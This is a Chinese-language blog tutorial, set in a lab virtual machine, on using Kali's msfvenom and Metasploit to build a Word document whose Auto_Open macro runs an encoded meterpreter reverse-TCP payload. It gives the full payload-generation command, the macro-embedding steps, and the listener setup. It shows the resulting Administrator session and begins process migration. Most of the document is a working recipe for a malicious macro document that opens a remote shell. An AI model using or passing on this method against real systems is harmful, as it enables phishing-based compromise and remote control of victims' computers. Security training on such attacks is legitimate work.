网络安全kali之利用宏感染word文档获取shell

发布于:2023-04-27 ⋅ 阅读:(134) ⋅ 点赞:(0)

首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。

┌──(root💀xuegod53)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e 
x86/shikata_ga_nai -i 10 -f vba-exe

视频教程

执行完成后会生成2段代码
第一段代码是MACRO CODE [ˈmækrəʊ kəʊd] 宏代码
从这里开始:
在这里插入图片描述
到这里结束:
在这里插入图片描述
第二段代码 payload。
在这里插入图片描述
注:*号中的内容不要,从这个往下开始复制,如下:
在这里插入图片描述
一直到最后。

打开Word新建空白文档,新建宏
在这里插入图片描述
宏名Auto_Open
在这里插入图片描述
清除默认的代码,复制第一段code代码内容到编辑器中,然后返回到Word内容编辑区。
在这里插入图片描述
复制第二段代码payload到word正文,然后保存文档。
在这里插入图片描述
按Ctrl+s保存
在这里插入图片描述
MSF配置侦听

msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
msf6 exploit(multi/handler) > jobs -K
msf6 exploit(multi/handler) > exploit

2、配置好侦听之后我们打开我们制作的word文档,文档一旦打开就会执行payload连接到MSF,关闭word文档之后session不受影响。
在这里插入图片描述
打开之后我们回到MSF控制台
在这里插入图片描述
Session已经建立

meterpreter > getuid 
Server username: XUESHEN\Administrator

我们尝试把payload转移到其他进程

meterpreter > getpid 		获取当前进程pid
Current pid: 2932
meterpreter > ps			#查看进程列表,在ps列出的进程列表,倒数第4个就是我们进程的pid

在这里插入图片描述

关注公众号学神来啦,领取更多的学习干货和资料哦~
点我建立联系

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到